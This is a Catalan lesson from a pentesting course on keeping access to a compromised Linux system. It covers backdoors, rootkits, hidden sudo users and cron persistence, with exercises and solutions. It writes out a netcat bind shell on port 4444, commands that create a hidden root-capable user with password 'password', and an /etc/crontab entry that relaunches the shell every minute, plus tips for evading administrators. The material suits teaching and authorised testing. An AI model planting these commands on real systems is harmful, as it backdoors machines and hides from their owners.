El manteniment de l'accés és una fase crucial en el procés de pentesting, ja que permet als atacants mantenir el control sobre un sistema compromès durant un període prolongat. Aquesta fase implica la implementació de mecanismes que permetin l'accés remot i la persistència en el sistema, fins i tot després de reinicis o altres intents de neteja per part dels administradors del sistema.
Objectius del Manteniment de l'Accés
- Persistència: Assegurar que l'accés es mantingui fins i tot després de reinicis del sistema o altres accions de manteniment.
- Accés remot: Configurar mecanismes per accedir al sistema de manera remota en qualsevol moment.
- Evasió de detecció: Implementar tècniques per evitar la detecció per part de sistemes de seguretat i administradors.
Tècniques Comunes de Manteniment de l'Accés
- Backdoors
Les backdoors són mecanismes que permeten l'accés remot al sistema sense necessitat d'autenticació. Poden ser programes o scripts que s'executen en segon pla.
Exemple de codi:
Explicació:
nc -lvp 4444 -e /bin/bash
: Utilitzanetcat
per escoltar en el port 4444 i executar/bin/bash
quan es connecti algú.
- Rootkits
Els rootkits són eines que permeten als atacants mantenir l'accés al sistema amagant la seva presència i les seves activitats.
Tipus de Rootkits:
- Kernel-level rootkits: Modifiquen el nucli del sistema operatiu per amagar processos, fitxers i connexions de xarxa.
- User-level rootkits: Substitueixen binaris del sistema per versions malicioses que amaguen l'activitat de l'atacant.
- Creació d'Usuaris Ocults
Crear usuaris amb privilegis elevats que no siguin fàcilment detectables pels administradors.
Exemple de codi:
# Afegeix un usuari ocult amb privilegis de root useradd -m -p $(openssl passwd -1 'password') -s /bin/bash hiddenuser usermod -aG sudo hiddenuser
Explicació:
useradd -m -p $(openssl passwd -1 'password') -s /bin/bash hiddenuser
: Crea un usuari amb el nomhiddenuser
i la contrasenyapassword
.usermod -aG sudo hiddenuser
: Afegeix l'usuarihiddenuser
al grupsudo
per obtenir privilegis de root.
- Modificació de Fitxers de Configuració
Modificar fitxers de configuració per assegurar que els serveis maliciosos s'iniciïn automàticament amb el sistema.
Exemple de codi:
# Afegeix una entrada al crontab per executar una backdoor cada minut echo "* * * * * /usr/bin/nc -lvp 4444 -e /bin/bash" >> /etc/crontab
Explicació:
echo "* * * * * /usr/bin/nc -lvp 4444 -e /bin/bash" >> /etc/crontab
: Afegeix una entrada al crontab per executar la backdoor cada minut.
Exercicis Pràctics
Exercici 1: Crear una Backdoor Simple
- Utilitza
netcat
per crear una backdoor que escolti en un port específic. - Prova de connectar-te a la backdoor des d'un altre sistema.
Solució:
# En el sistema compromès nc -lvp 4444 -e /bin/bash # En el sistema de l'atacant nc <IP_del_sistema_compromès> 4444
Exercici 2: Crear un Usuari Ocult
- Crea un usuari ocult amb privilegis de root.
- Verifica que l'usuari pot executar comandes amb privilegis elevats.
Solució:
# Crear l'usuari ocult useradd -m -p $(openssl passwd -1 'password') -s /bin/bash hiddenuser usermod -aG sudo hiddenuser # Verificar els privilegis su - hiddenuser sudo whoami
Errors Comuns i Consells
Errors Comuns
- No comprovar la persistència: No verificar si els mecanismes de manteniment de l'accés funcionen després de reinicis del sistema.
- Deixar rastres evidents: Utilitzar noms d'usuaris o fitxers que són fàcilment detectables pels administradors.
Consells
- Utilitza noms discrets: Tria noms d'usuaris i fitxers que no cridin l'atenció.
- Verifica la persistència: Prova els mecanismes de manteniment de l'accés després de reinicis i altres accions de manteniment.
Conclusió
El manteniment de l'accés és una fase crítica en el pentesting que permet als atacants mantenir el control sobre un sistema compromès. Utilitzant tècniques com les backdoors, els rootkits, la creació d'usuaris ocults i la modificació de fitxers de configuració, els pentesters poden assegurar-se que poden accedir al sistema en qualsevol moment. És important practicar aquestes tècniques de manera ètica i legal, i sempre amb el consentiment del propietari del sistema.
Curs de Pentesting: Tècniques de Proves de Penetració
Mòdul 1: Introducció al Pentesting
Mòdul 2: Reconeixement i Recollida d'Informació
Mòdul 3: Escaneig i Enumeració
Mòdul 4: Explotació de Vulnerabilitats
- Introducció a l'Explotació
- Explotació de Vulnerabilitats Web
- Explotació de Vulnerabilitats de Xarxa
- Explotació de Vulnerabilitats de Sistemes